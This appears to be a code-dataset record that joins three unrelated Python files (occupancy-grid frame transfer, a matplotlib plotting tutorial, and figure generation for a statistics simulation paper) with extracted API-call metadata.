(['out'], {'dtype': 'int'}), '(out, dtype=int)\n', (9438, 9454), True, 'import numpy as np\n'), ((10811, 10822), 'matrixprofile.io.protobuf.proto_messages_pb2.MPFOutput', 'MPFOutput', ([], {}), '()\n', (10820, 10822), False, 'from matrixprofile.io.protobuf.proto_messages_pb2 import Location, Motif, MPFOutput\n'), ((1467, 1491), 'matrixprofile.core.is_pmp_obj', 'core.is_pmp_obj', (['profile'], {}), '(profile)\n', (1482, 1491), False, 'from matrixprofile import core\n'), ((2094, 2104), 'matrixprofile.io.protobuf.proto_messages_pb2.Location', 'Location', ([], {}), '()\n', (2102, 2104), False, 'from matrixprofile.io.protobuf.proto_messages_pb2 import Location, Motif, MPFOutput\n'), ((2198, 2225), 'matrixprofile.core.is_array_like', 'core.is_array_like', (['indices'], {}), '(indices)\n', (2216, 2225), False, 'from matrixprofile import core\n'), ((2430, 2440), 'matrixprofile.io.protobuf.proto_messages_pb2.Location', 'Location', ([], {}), '()\n', (2438, 2440), False, 'from matrixprofile.io.protobuf.proto_messages_pb2 import Location, Motif, MPFOutput\n'), ((2534, 2562), 'matrixprofile.core.is_array_like', 'core.is_array_like', (['neighbor'], {}), '(neighbor)\n', (2552, 2562), False, 'from matrixprofile import core\n'), ((4482, 4506), 'matrixprofile.core.is_array_like', 'core.is_array_like', (['data'], {}), '(data)\n', (4500, 4506), False, 'from matrixprofile import core\n'), ((7351, 7375), 'matrixprofile.core.is_pmp_obj', 'core.is_pmp_obj', (['profile'], {}), '(profile)\n', (7366, 7375), False, 'from matrixprofile import core\n'), ((825, 851), 'matrixprofile.core.is_array_like', 'core.is_array_like', (['matrix'], {}), '(matrix)\n', (843, 851), False, 'from matrixprofile import core\n'), ((6353, 6377), 'matrixprofile.core.is_array_like', 'core.is_array_like', (['data'], {}), '(data)\n', (6371, 6377), False, 'from matrixprofile import core\n'), ((6616, 6640), 'matrixprofile.core.is_array_like', 'core.is_array_like', (['data'], {}), '(data)\n', (6634, 6640), False, 'from matrixprofile import core\n'), ((6879, 6903), 'matrixprofile.core.is_array_like', 'core.is_array_like', (['data'], {}), '(data)\n', (6897, 6903), False, 'from matrixprofile import core\n'), ((7142, 7166), 'matrixprofile.core.is_array_like', 'core.is_array_like', (['data'], 
{}), '(data)\n', (7160, 7166), False, 'from matrixprofile import core\n'), ((11868, 11889), 'numpy.array', 'np.array', (['obj.windows'], {}), '(obj.windows)\n', (11876, 11889), True, 'import numpy as np\n')]
|
# Code to transform the driver sensor OGMs to the ego vehicle's OGM frame of reference.
import matplotlib.pyplot as plt
import numpy as np
import math
import copy
from utils.grid_utils import global_grid
import time
from scipy.spatial import cKDTree
import pdb
def mask_in_EgoGrid(global_grid_x, global_grid_y, ref_xy, ego_xy, pred_egoGrid, pred_maps, res, mask_unk=None, tolerance=1):
# Consider only the unknown cells in pred_egoGrid (ego sensor grid before trasfering values).
indices = np.where(mask_unk)
ego_x = ego_xy[0][indices]
ego_y = ego_xy[1][indices]
ego_xy = [ego_x, ego_y]
flat_indicies = indices[0]*pred_egoGrid.shape[1]+indices[1]
# ref indx --> global indx
ref_x_ind = np.floor(global_grid_x.shape[1]*(ref_xy[0]-x_min+res/2.)/(x_max-x_min+res)).astype(int) # column index
ref_y_ind = np.floor(global_grid_y.shape[0]*(ref_xy[1]-y_min+res/2.)/(y_max-y_min+res)).astype(int) # row index
ref_global_ind = np.vstack((ref_y_ind.flatten(), ref_x_ind.flatten())).T
# ego indx --> global indx
ego_x_ind = np.floor(global_grid_x.shape[1]*(ego_xy[0]-x_min+res/2.)/(x_max-x_min+res)).astype(int) # column index
ego_y_ind = np.floor(global_grid_y.shape[0]*(ego_xy[1]-y_min+res/2.)/(y_max-y_min+res)).astype(int) # row index
ego_global_ind = np.vstack((ego_y_ind.flatten(), ego_x_ind.flatten())).T
# Look for the matching global_grid indices between the ref_grid and ego_grid.
kdtree = cKDTree(ref_global_ind)
dists, inds = kdtree.query(ego_global_ind)
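    # query() gives, for every unknown ego cell, the distance (in global-grid
    # index units) to its nearest reference cell and that cell's position in
    # ref_global_ind; only matches within `tolerance` indices are used below.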
pred_egoGrid_flat = pred_egoGrid.flatten()
pred_maps_flat = pred_maps.flatten()
# Back to the local grid indices. Tolerance should be an integer because kd tree is comparing indices.
ego_ind = flat_indicies[np.where(dists<=tolerance)]
ref_ind = inds[np.where(dists<=tolerance)]
# Assign the values for the corresponding cells.
pred_egoGrid_flat[ego_ind] = pred_maps_flat[ref_ind]
pred_egoGrid = pred_egoGrid_flat.reshape(pred_egoGrid.shape)
return pred_egoGrid
def Transfer_to_EgoGrid(ref_local_xy, pred_maps, ego_local_xy, ego_sensor_grid, endpoint, res=0.1, mask_unk=None):
global x_min, x_max, y_min, y_max
#####################################################################################################################################
## Goal : Transfer pred_maps (in driver sensor's grid) cell information to the unknown cells of ego car's sensor_grid
## Method : Use global grid as an intermediate (ref indx --> global indx --> ego indx).
## ref_local_xy (N, 2, w, h) & pred_maps (N, w, h)
## ego_xy (2, w', h') & & ego_sensor_grid (w', h')
## return pred_maps_egoGrid(N, w', h')
## * N : number of agents
#####################################################################################################################################
x_min = endpoint[0]
x_max = endpoint[2]
y_min = endpoint[1]
y_max = endpoint[3]
global_res = 1.0
global_grid_x, global_grid_y = global_grid(np.array([x_min,y_min]),np.array([x_max,y_max]),global_res)
if np.any(ref_local_xy[0] == None):
        # No driver-sensor grid is available for this agent.
        pred_egoGrid = None
else:
pred_egoGrid = copy.copy(ego_sensor_grid)
pred_egoGrid = np.ones(ego_sensor_grid.shape)*2
pred_egoGrid = mask_in_EgoGrid(global_grid_x, global_grid_y, ref_local_xy, ego_local_xy, pred_egoGrid, pred_maps, res, mask_unk)
return pred_egoGrid
|
[
"numpy.ones",
"scipy.spatial.cKDTree",
"numpy.where",
"numpy.floor",
"numpy.any",
"numpy.array",
"copy.copy"
] |
[((501, 519), 'numpy.where', 'np.where', (['mask_unk'], {}), '(mask_unk)\n', (509, 519), True, 'import numpy as np\n'), ((1460, 1483), 'scipy.spatial.cKDTree', 'cKDTree', (['ref_global_ind'], {}), '(ref_global_ind)\n', (1467, 1483), False, 'from scipy.spatial import cKDTree\n'), ((3095, 3126), 'numpy.any', 'np.any', (['(ref_local_xy[0] == None)'], {}), '(ref_local_xy[0] == None)\n', (3101, 3126), True, 'import numpy as np\n'), ((1757, 1785), 'numpy.where', 'np.where', (['(dists <= tolerance)'], {}), '(dists <= tolerance)\n', (1765, 1785), True, 'import numpy as np\n'), ((1804, 1832), 'numpy.where', 'np.where', (['(dists <= tolerance)'], {}), '(dists <= tolerance)\n', (1812, 1832), True, 'import numpy as np\n'), ((3027, 3051), 'numpy.array', 'np.array', (['[x_min, y_min]'], {}), '([x_min, y_min])\n', (3035, 3051), True, 'import numpy as np\n'), ((3051, 3075), 'numpy.array', 'np.array', (['[x_max, y_max]'], {}), '([x_max, y_max])\n', (3059, 3075), True, 'import numpy as np\n'), ((3201, 3227), 'copy.copy', 'copy.copy', (['ego_sensor_grid'], {}), '(ego_sensor_grid)\n', (3210, 3227), False, 'import copy\n'), ((722, 816), 'numpy.floor', 'np.floor', (['(global_grid_x.shape[1] * (ref_xy[0] - x_min + res / 2.0) / (x_max - x_min +\n res))'], {}), '(global_grid_x.shape[1] * (ref_xy[0] - x_min + res / 2.0) / (x_max -\n x_min + res))\n', (730, 816), True, 'import numpy as np\n'), ((841, 935), 'numpy.floor', 'np.floor', (['(global_grid_y.shape[0] * (ref_xy[1] - y_min + res / 2.0) / (y_max - y_min +\n res))'], {}), '(global_grid_y.shape[0] * (ref_xy[1] - y_min + res / 2.0) / (y_max -\n y_min + res))\n', (849, 935), True, 'import numpy as np\n'), ((1067, 1161), 'numpy.floor', 'np.floor', (['(global_grid_x.shape[1] * (ego_xy[0] - x_min + res / 2.0) / (x_max - x_min +\n res))'], {}), '(global_grid_x.shape[1] * (ego_xy[0] - x_min + res / 2.0) / (x_max -\n x_min + res))\n', (1075, 1161), True, 'import numpy as np\n'), ((1186, 1280), 'numpy.floor', 'np.floor', (['(global_grid_y.shape[0] * (ego_xy[1] - y_min + res / 2.0) / (y_max - y_min +\n res))'], {}), '(global_grid_y.shape[0] * (ego_xy[1] - y_min + res / 2.0) / (y_max -\n y_min + res))\n', (1194, 1280), True, 'import numpy as np\n'), ((3252, 3282), 'numpy.ones', 'np.ones', (['ego_sensor_grid.shape'], {}), '(ego_sensor_grid.shape)\n', (3259, 3282), True, 'import numpy as np\n')]
|
# chapter Matplotlib Plotting
'''
The plot() function is used to draw points (markers) in a diagram.
By default, the plot() function draws a line from point to point.
The function takes parameters for specifying points in the diagram.
Parameter 1 is an array containing the points on the x-axis.
Parameter 2 is an array containing the points on the y-axis.
If we need to plot a line from (1, 3) to (8, 10), we have to pass two arrays [1, 8] and [3, 10] to the plot function.
'''
# Draw a line in a diagram from position (1, 3) to position (8, 10):
import matplotlib.pyplot as plt
import numpy as r
import sys
x=r.array([1,8])
y=r.array([3,10])
plt.plot(x,y)
plt.show()
'''
Plotting Without Line
To plot only the markers, you can use shortcut string notation parameter 'o', which means 'rings'.
'''
x=r.array([3,10])
y=r.array([0,34])
plt.plot(x,y,'o')
plt.show()
'''
Multiple Points
You can plot as many points as you like, just make sure you have the same number of points in both axis.
Example
Draw a line in a diagram from position (1, 3) to (2, 6), then to (4, 8), and finally to position (9, 10):
'''
x=r.array([1,2,4,9])
y=r.array([3,6,8,10])
plt.plot(x,y,label="red")
plt.show()
#Two lines to make our compiler able to draw:
plt.savefig(sys.stdout.buffer)
sys.stdout.flush()
'''
Default X-Points
If we do not specify the points in the x-axis, they will get the default values 0, 1, 2, 3, (etc. depending on the length of the y-points.
So, if we take the same example as above, and leave out the x-points, the diagram will look like this:
'''
# Plotting without x-points:
ypoints=r.array([0,2,3,5,6,7,99])
plt.plot(ypoints)
plt.show()
plt.savefig(sys.stdout.buffer)
sys.stdout.flush()
# CHAPTER Matplotlib Markers
'''
Markers
You can use the keyword argument marker to emphasize each point with a specified marker:
'''
x=r.array([0,3,5,6,8,9])
y=r.array([2,4,6,7,8,10])
plt.plot(x,y,marker="*")
plt.show()
'''
Marker Reference
You can choose any of these markers:
Marker Description
'o' Circle
'*' Star
'.' Point
',' Pixel
'x' X
'X' X (filled)
'+' Plus
'P' Plus (filled)
's' Square
'D' Diamond
'd' Diamond (thin)
'p' Pentagon
'H' Hexagon
'h' Hexagon
'v' Triangle Down
'^' Triangle Up
'<' Triangle Left
'>' Triangle Right
'1' Tri Down
'2' Tri Up
'3' Tri Left
'4' Tri Right
'|' Vline
'_' Hline
'''
'''
Format Strings fmt
You can also use the shortcut string notation parameter to specify the marker, line style and color together.
This parameter is also called fmt, and is written with this syntax:
marker|line|color
Example
Draw a dash-dot red line through the points:
'''
x=r.array([3,5,5,6,7,8])
y=r.array([1,3,5,6,7,8])
plt.plot(x,y,'-.r')
plt.show()
'''
The marker value can be anything from the Marker Reference above.
The line value can be one of the following:
Line Reference
Line Syntax Description
'-' Solid line
':' Dotted line
'--' Dashed line
'-.' Dashed/dotted line
Note: If you leave out the line value in the fmt parameter, no line will be plotted.
'''
'''
Color Reference
Color Syntax Description
'r' Red
'g' Green
'b' Blue
'c' Cyan
'm' Magenta
'y' Yellow
'k' Black
'w' White
'''
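'''
Combining a marker, line style and color in one fmt string (an added illustration
reusing the plotting calls shown above):
'''
x=r.array([1,2,3,4,5,6])
y=r.array([2,4,6,8,10,12])
plt.plot(x,y,'o:g')
plt.show()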
'''
Marker Size
You can use the keyword argument markersize or the shorter version, ms to set the size of the markers:
'''
x=r.array([1,3,4,5,9,5])
y=r.array([0,3,6,8,8])
plt.plot(x,marker='o',ms=17)
plt.show()
'''
Marker Color
You can use the keyword argument markeredgecolor or the shorter mec to set the color of the edge of the markers:
Example
Set the EDGE color to red:
'''
x=r.array([2,3,5,6])
y=r.array([0,3,5,6,8])
plt.plot(x,marker='*',ms=34,mec='r')
plt.show()
'''
You can use the keyword argument markerfacecolor or the shorter mfc to set the color inside the edge of the markers:
Example
Set the FACE color to red:
'''
x=r.array([1,3,5,6])
y=r.array([2,3,5,6])
plt.plot(x,marker='*',ms=34,mfc='r')
plt.show()
'''
# Use both the mec and mfc arguments to color the entire marker:
# Example
# Set the color of both the edge and the face to red:
'''
import matplotlib.pyplot as plt
import numpy as r
y=r.array([0,4,6,7,7,8])
plt.plot(y,marker='*',ms=30,mec='r',mfc='r')
plt.show()
'''
You can also use Hexadecimal color values:
Example
Mark each point with a beautiful green color:
...
plt.plot(ypoints, marker = 'o', ms = 20, mec = '#4CAF50', mfc = '#4CAF50')
...
'''
import matplotlib.pyplot as plt
import numpy as np
x=np.array([1,2,3,4,5,6,5,7])
y=np.array([1,2,4,5,5,6,])
plt.plot(y,ms=34,marker='*',mec='hotpink',mfc="hotpink",linestyle=':')
plt.show()
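# Illustrative aside: matplotlib accepts both hexadecimal color strings such as '#4CAF50'
# (quoted in the text above) and named colors such as the 'hotpink' used here.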
|
[
"matplotlib.pyplot.savefig",
"matplotlib.pyplot.plot",
"numpy.array",
"sys.stdout.flush",
"matplotlib.pyplot.show"
] |
[((646, 661), 'numpy.array', 'r.array', (['[1, 9]'], {}), '([1, 9])\n', (653, 661), True, 'import numpy as r\n'), ((665, 681), 'numpy.array', 'r.array', (['[4, 10]'], {}), '([4, 10])\n', (672, 681), True, 'import numpy as r\n'), ((684, 698), 'matplotlib.pyplot.plot', 'plt.plot', (['x', 'y'], {}), '(x, y)\n', (692, 698), True, 'import matplotlib.pyplot as plt\n'), ((699, 709), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (707, 709), True, 'import matplotlib.pyplot as plt\n'), ((852, 868), 'numpy.array', 'r.array', (['[3, 10]'], {}), '([3, 10])\n', (859, 868), True, 'import numpy as r\n'), ((873, 889), 'numpy.array', 'r.array', (['[0, 34]'], {}), '([0, 34])\n', (880, 889), True, 'import numpy as r\n'), ((892, 911), 'matplotlib.pyplot.plot', 'plt.plot', (['x', 'y', '"""o"""'], {}), "(x, y, 'o')\n", (900, 911), True, 'import matplotlib.pyplot as plt\n'), ((911, 921), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (919, 921), True, 'import matplotlib.pyplot as plt\n'), ((1181, 1202), 'numpy.array', 'r.array', (['[1, 2, 4, 9]'], {}), '([1, 2, 4, 9])\n', (1188, 1202), True, 'import numpy as r\n'), ((1203, 1225), 'numpy.array', 'r.array', (['[3, 6, 8, 10]'], {}), '([3, 6, 8, 10])\n', (1210, 1225), True, 'import numpy as r\n'), ((1226, 1253), 'matplotlib.pyplot.plot', 'plt.plot', (['x', 'y'], {'label': '"""red"""'}), "(x, y, label='red')\n", (1234, 1253), True, 'import matplotlib.pyplot as plt\n'), ((1253, 1263), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1261, 1263), True, 'import matplotlib.pyplot as plt\n'), ((1319, 1349), 'matplotlib.pyplot.savefig', 'plt.savefig', (['sys.stdout.buffer'], {}), '(sys.stdout.buffer)\n', (1330, 1349), True, 'import matplotlib.pyplot as plt\n'), ((1351, 1369), 'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\n', (1367, 1369), False, 'import sys\n'), ((1689, 1720), 'numpy.array', 'r.array', (['[0, 2, 3, 5, 6, 7, 99]'], {}), '([0, 2, 3, 5, 6, 7, 99])\n', (1696, 1720), True, 'import numpy as r\n'), ((1718, 1735), 'matplotlib.pyplot.plot', 'plt.plot', (['ypoints'], {}), '(ypoints)\n', (1726, 1735), True, 'import matplotlib.pyplot as plt\n'), ((1737, 1747), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1745, 1747), True, 'import matplotlib.pyplot as plt\n'), ((1751, 1781), 'matplotlib.pyplot.savefig', 'plt.savefig', (['sys.stdout.buffer'], {}), '(sys.stdout.buffer)\n', (1762, 1781), True, 'import matplotlib.pyplot as plt\n'), ((1783, 1801), 'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\n', (1799, 1801), False, 'import sys\n'), ((1950, 1977), 'numpy.array', 'r.array', (['[0, 3, 5, 6, 8, 9]'], {}), '([0, 3, 5, 6, 8, 9])\n', (1957, 1977), True, 'import numpy as r\n'), ((1978, 2006), 'numpy.array', 'r.array', (['[2, 4, 6, 7, 8, 10]'], {}), '([2, 4, 6, 7, 8, 10])\n', (1985, 2006), True, 'import numpy as r\n'), ((2005, 2031), 'matplotlib.pyplot.plot', 'plt.plot', (['x', 'y'], {'marker': '"""*"""'}), "(x, y, marker='*')\n", (2013, 2031), True, 'import matplotlib.pyplot as plt\n'), ((2033, 2043), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2041, 2043), True, 'import matplotlib.pyplot as plt\n'), ((2794, 2821), 'numpy.array', 'r.array', (['[3, 5, 5, 6, 7, 8]'], {}), '([3, 5, 5, 6, 7, 8])\n', (2801, 2821), True, 'import numpy as r\n'), ((2820, 2847), 'numpy.array', 'r.array', (['[1, 3, 5, 6, 7, 8]'], {}), '([1, 3, 5, 6, 7, 8])\n', (2827, 2847), True, 'import numpy as r\n'), ((2846, 2867), 'matplotlib.pyplot.plot', 'plt.plot', (['x', 'y', '"""-.r"""'], {}), "(x, y, '-.r')\n", (2854, 2867), True, 'import 
matplotlib.pyplot as plt\n'), ((2867, 2877), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2875, 2877), True, 'import matplotlib.pyplot as plt\n'), ((3525, 3552), 'numpy.array', 'r.array', (['[1, 3, 4, 5, 9, 5]'], {}), '([1, 3, 4, 5, 9, 5])\n', (3532, 3552), True, 'import numpy as r\n'), ((3551, 3575), 'numpy.array', 'r.array', (['[0, 3, 6, 8, 8]'], {}), '([0, 3, 6, 8, 8])\n', (3558, 3575), True, 'import numpy as r\n'), ((3575, 3607), 'matplotlib.pyplot.plot', 'plt.plot', (['x'], {'marker': '"""o"""', 'ms': '"""17"""'}), "(x, marker='o', ms='17')\n", (3583, 3607), True, 'import matplotlib.pyplot as plt\n'), ((3607, 3617), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (3615, 3617), True, 'import matplotlib.pyplot as plt\n'), ((3802, 3823), 'numpy.array', 'r.array', (['[2, 3, 5, 6]'], {}), '([2, 3, 5, 6])\n', (3809, 3823), True, 'import numpy as r\n'), ((3824, 3846), 'numpy.array', 'r.array', (['"""[0,3,5,6,8]"""'], {}), "('[0,3,5,6,8]')\n", (3831, 3846), True, 'import numpy as r\n'), ((3850, 3889), 'matplotlib.pyplot.plot', 'plt.plot', (['x'], {'marker': '"""*"""', 'ms': '(34)', 'mec': '"""r"""'}), "(x, marker='*', ms=34, mec='r')\n", (3858, 3889), True, 'import matplotlib.pyplot as plt\n'), ((3888, 3898), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (3896, 3898), True, 'import matplotlib.pyplot as plt\n'), ((4073, 4094), 'numpy.array', 'r.array', (['[1, 3, 5, 6]'], {}), '([1, 3, 5, 6])\n', (4080, 4094), True, 'import numpy as r\n'), ((4095, 4116), 'numpy.array', 'r.array', (['[2, 3, 5, 6]'], {}), '([2, 3, 5, 6])\n', (4102, 4116), True, 'import numpy as r\n'), ((4117, 4156), 'matplotlib.pyplot.plot', 'plt.plot', (['x'], {'marker': '"""*"""', 'ms': '(34)', 'mfc': '"""r"""'}), "(x, marker='*', ms=34, mfc='r')\n", (4125, 4156), True, 'import matplotlib.pyplot as plt\n'), ((4155, 4165), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (4163, 4165), True, 'import matplotlib.pyplot as plt\n'), ((4370, 4397), 'numpy.array', 'r.array', (['[0, 4, 6, 7, 7, 8]'], {}), '([0, 4, 6, 7, 7, 8])\n', (4377, 4397), True, 'import numpy as r\n'), ((4396, 4444), 'matplotlib.pyplot.plot', 'plt.plot', (['y'], {'marker': '"""*"""', 'ms': '(30)', 'mec': '"""r"""', 'mfc': '"""r"""'}), "(y, marker='*', ms=30, mec='r', mfc='r')\n", (4404, 4444), True, 'import matplotlib.pyplot as plt\n'), ((4442, 4452), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (4450, 4452), True, 'import matplotlib.pyplot as plt\n'), ((4715, 4749), 'numpy.array', 'np.array', (['[1, 2, 3, 4, 5, 6, 5, 7]'], {}), '([1, 2, 3, 4, 5, 6, 5, 7])\n', (4723, 4749), True, 'import numpy as np\n'), ((4746, 4774), 'numpy.array', 'np.array', (['[1, 2, 4, 5, 5, 6]'], {}), '([1, 2, 4, 5, 5, 6])\n', (4754, 4774), True, 'import numpy as np\n'), ((4774, 4849), 'matplotlib.pyplot.plot', 'plt.plot', (['y'], {'ms': '(34)', 'marker': '"""*"""', 'mec': '"""hotpink"""', 'mfc': '"""hotpink"""', 'linestyle': '""":"""'}), "(y, ms=34, marker='*', mec='hotpink', mfc='hotpink', linestyle=':')\n", (4782, 4849), True, 'import matplotlib.pyplot as plt\n'), ((4848, 4858), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (4856, 4858), True, 'import matplotlib.pyplot as plt\n')]
|
# -*- coding: utf-8 -*-
"""
Make figures for MUSim paper
AUTHOR: <NAME>
VERSION DATE: 26 June 2019
"""
import os
from os.path import join
import numpy as np
import pandas as pd
from statsmodels.stats.proportion import proportion_confint
import matplotlib.pyplot as plt
def binom_ci_precision(proportion, nobs, method='beta', alpha=0.05):
"""
Get precision for binomial proportion confidence interval
"""
count = proportion * nobs
ci = proportion_confint(count, nobs, method=method, alpha=alpha)
ci_precision = ci[1] - proportion
return ci_precision
def make_power_bar(data, colors, error_bars='se', mean_amp=True, legend=False):
use_colors = colors.copy()
use_cols = ['Fmax', 'cluster_05', 'cluster_01', 'BH', 'BY', 'BKY']
if mean_amp:
use_cols.insert(0, 'mean_amp')
#Get values for error bars
power_data = data.loc[:, use_cols].to_numpy().T
if error_bars.lower() == 'se':
stderr = np.sqrt( (power_data*(1-power_data)) / 10000 )
elif error_bars.lower() == 'ci':
stderr = binom_ci_precision(power_data, 10000)
elif error_bars is None:
stderr = None
else:
raise ValueError('Incorrect input for error_bars')
#Plot
    labels = ['Fmax', 'cluster (p≤0.05 threshold)', 'cluster (p≤0.01 threshold)',
'FDR (Benjamini & Hochberg, 1995)', 'FDR (Benjamini & Yekutieli, 2001)',
'FDR (Benjamini et al., 2006)']
if mean_amp:
labels.insert(0, 'mean amplitude')
use_colors.insert(0, 'black')
data.plot.bar(x='time_window', y=use_cols, label=labels, color=use_colors,
fontsize=16, yerr=stderr, legend=legend)
plt.xticks(rotation='horizontal')
plt.xlabel('')
plt.ylim((0,1))
if legend:
plt.legend(loc=(1.04,0), prop={'size': 12})
def make_power_figures(colors, results_dir):
#Get all results csv files
results_files = [file for file in os.listdir(results_dir) if file.endswith('.csv')]
for results_file in results_files:
#Load data
data = pd.read_csv(join(results_dir, results_file))
if 'Power' in results_file and 'Familywise' in results_file:
if 'FamilywisePower' in results_file:
mean_amp = True
else:
mean_amp = False
#Make file with legend
if not os.path.isfile(join(results_dir, 'legend.tif')):
make_power_bar(data[0:3], colors, legend=True)
img_file = join(results_dir, 'legend.tif')
plt.savefig(img_file, bbox_inches='tight', dpi=600)
plt.close()
#Make figures
make_power_bar(data[0:3], colors, error_bars='CI', mean_amp=mean_amp)
img_file = join(results_dir, '%s_N400.tif' % results_file.strip('.csv'))
plt.savefig(img_file, bbox_inches='tight', dpi=600)
plt.close()
make_power_bar(data[3:6], colors, error_bars='CI', mean_amp=mean_amp)
img_file = join(results_dir, '%s_P300.tif' % results_file.strip('.csv'))
plt.savefig(img_file, bbox_inches='tight', dpi=600)
plt.close()
make_power_bar(data[6:9], colors, error_bars='CI', mean_amp=mean_amp)
img_file = join(results_dir, '%s_P1.tif' % results_file.strip('.csv'))
plt.savefig(img_file, bbox_inches='tight', dpi=600)
plt.close()
def make_null_figures(results_dir):
#Get data
data = pd.read_csv(join(results_dir, 'MUSim_Null_FamilywiseTypeI.csv'))
data[['n_trials', 'n_subjects']] = data[['n_trials', 'n_subjects']].astype(int)
#Plotting parameters
use_cols = ['mean_amp', 'Fmax', 'cluster_05', 'cluster_01']
labels = ['mean amplitude', 'Fmax', 'cluster (p ≤ 0.05 threshold)', 'cluster (p ≤ 0.01 threshold)']
use_colors = ['black', 'lightgreen', 'navy', 'cornflowerblue']
for time_wind in ('0 - 300', '300 - 1000'):
for trials in (40, 20, 10):
plot_subset = data[(data['time_window'] == time_wind) & (data['n_trials'] == trials)]
proportions = plot_subset.loc[:, use_cols].to_numpy().T
stderr = binom_ci_precision(proportions, 10000)
#Make bar graph
plot_subset.plot.bar(x='n_subjects', y=use_cols, label=labels, color=use_colors,
fontsize=16, yerr=stderr, legend=False)
plt.xticks(rotation='horizontal')
plt.xlabel('')
plt.ylim((0,0.1))
plt.axhline(y=0.05,linewidth=1, color='r', linestyle='--')
plt.yticks(np.arange(1,11)/100)
plt.xlabel('Number of Subjects', fontsize=18)
#Save file
img_file = join(results_dir, 'MUSim_Null_FamilywiseTypeI_%s_%dtrials.tif' % (time_wind, trials))
plt.savefig(img_file, bbox_inches='tight', dpi=600)
plt.close()
def make_EW_figures(colors, results_dir):
ew_files = [file for file in os.listdir(results_dir) if 'Power_EW' in file and file.endswith('.csv')]
for ew_file in ew_files:
#Get data
data = pd.read_csv(join(results_dir, ew_file))
        #Rename columns to labels to be used in the figure
data.columns = ['uncorrected', 'Sidak', 'Fmax', 'Clust0.05', 'Clust0.01', 'BH FDR', 'BY FDR', 'BKY FDR']
#Make box plot
bplot = data.loc[:, 'Fmax':].boxplot(whis=[5, 95], showfliers=False,
return_type='dict', patch_artist=True,
fontsize=12)
        #For proportion measures, set a standard y-scale
if 'onset' not in ew_file and 'offset' not in ew_file:
plt.ylim((0,1))
#Update colors and line sizes
for key in bplot.keys():
i = 0
for item in bplot[key]:
item.set_linewidth(4)
if key == 'medians':
item.set_color('black')
else:
item.set_color(colors[int(i)])
if key in ['whiskers', 'caps']:
i += 0.5
else:
i += 1
#Save figure
img_file = join(results_dir, ew_file.strip('.csv') + '.tif')
plt.savefig(img_file, bbox_inches='tight', dpi=600)
plt.close()
def main():
results_dir = r'C:\Users\ecfne\Documents\Eric\Research\Stats Simulations\MUSim\results'
colors = ['lightgreen', 'navy', 'cornflowerblue', 'red', 'lightcoral', 'firebrick']
make_power_figures(colors, results_dir)
make_null_figures(results_dir)
make_EW_figures(colors, results_dir)
if __name__ == '__main__':
main()
|
[
"os.listdir",
"numpy.sqrt",
"matplotlib.pyplot.savefig",
"matplotlib.pyplot.xticks",
"statsmodels.stats.proportion.proportion_confint",
"numpy.arange",
"matplotlib.pyplot.xlabel",
"os.path.join",
"matplotlib.pyplot.close",
"matplotlib.pyplot.axhline",
"matplotlib.pyplot.ylim",
"matplotlib.pyplot.legend"
] |
[((480, 539), 'statsmodels.stats.proportion.proportion_confint', 'proportion_confint', (['count', 'nobs'], {'method': 'method', 'alpha': 'alpha'}), '(count, nobs, method=method, alpha=alpha)\n', (498, 539), False, 'from statsmodels.stats.proportion import proportion_confint\n'), ((1754, 1787), 'matplotlib.pyplot.xticks', 'plt.xticks', ([], {'rotation': '"""horizontal"""'}), "(rotation='horizontal')\n", (1764, 1787), True, 'import matplotlib.pyplot as plt\n'), ((1793, 1807), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['""""""'], {}), "('')\n", (1803, 1807), True, 'import matplotlib.pyplot as plt\n'), ((1813, 1829), 'matplotlib.pyplot.ylim', 'plt.ylim', (['(0, 1)'], {}), '((0, 1))\n', (1821, 1829), True, 'import matplotlib.pyplot as plt\n'), ((1006, 1052), 'numpy.sqrt', 'np.sqrt', (['(power_data * (1 - power_data) / 10000)'], {}), '(power_data * (1 - power_data) / 10000)\n', (1013, 1052), True, 'import numpy as np\n'), ((1854, 1898), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'loc': '(1.04, 0)', 'prop': "{'size': 12}"}), "(loc=(1.04, 0), prop={'size': 12})\n", (1864, 1898), True, 'import matplotlib.pyplot as plt\n'), ((3725, 3776), 'os.path.join', 'join', (['results_dir', '"""MUSim_Null_FamilywiseTypeI.csv"""'], {}), "(results_dir, 'MUSim_Null_FamilywiseTypeI.csv')\n", (3729, 3776), False, 'from os.path import join\n'), ((6628, 6679), 'matplotlib.pyplot.savefig', 'plt.savefig', (['img_file'], {'bbox_inches': '"""tight"""', 'dpi': '(600)'}), "(img_file, bbox_inches='tight', dpi=600)\n", (6639, 6679), True, 'import matplotlib.pyplot as plt\n'), ((6689, 6700), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (6698, 6700), True, 'import matplotlib.pyplot as plt\n'), ((2029, 2052), 'os.listdir', 'os.listdir', (['results_dir'], {}), '(results_dir)\n', (2039, 2052), False, 'import os\n'), ((2183, 2214), 'os.path.join', 'join', (['results_dir', 'results_file'], {}), '(results_dir, results_file)\n', (2187, 2214), False, 'from os.path import join\n'), ((3011, 3062), 'matplotlib.pyplot.savefig', 'plt.savefig', (['img_file'], {'bbox_inches': '"""tight"""', 'dpi': '(600)'}), "(img_file, bbox_inches='tight', dpi=600)\n", (3022, 3062), True, 'import matplotlib.pyplot as plt\n'), ((3076, 3087), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (3085, 3087), True, 'import matplotlib.pyplot as plt\n'), ((3285, 3336), 'matplotlib.pyplot.savefig', 'plt.savefig', (['img_file'], {'bbox_inches': '"""tight"""', 'dpi': '(600)'}), "(img_file, bbox_inches='tight', dpi=600)\n", (3296, 3336), True, 'import matplotlib.pyplot as plt\n'), ((3350, 3361), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (3359, 3361), True, 'import matplotlib.pyplot as plt\n'), ((3556, 3607), 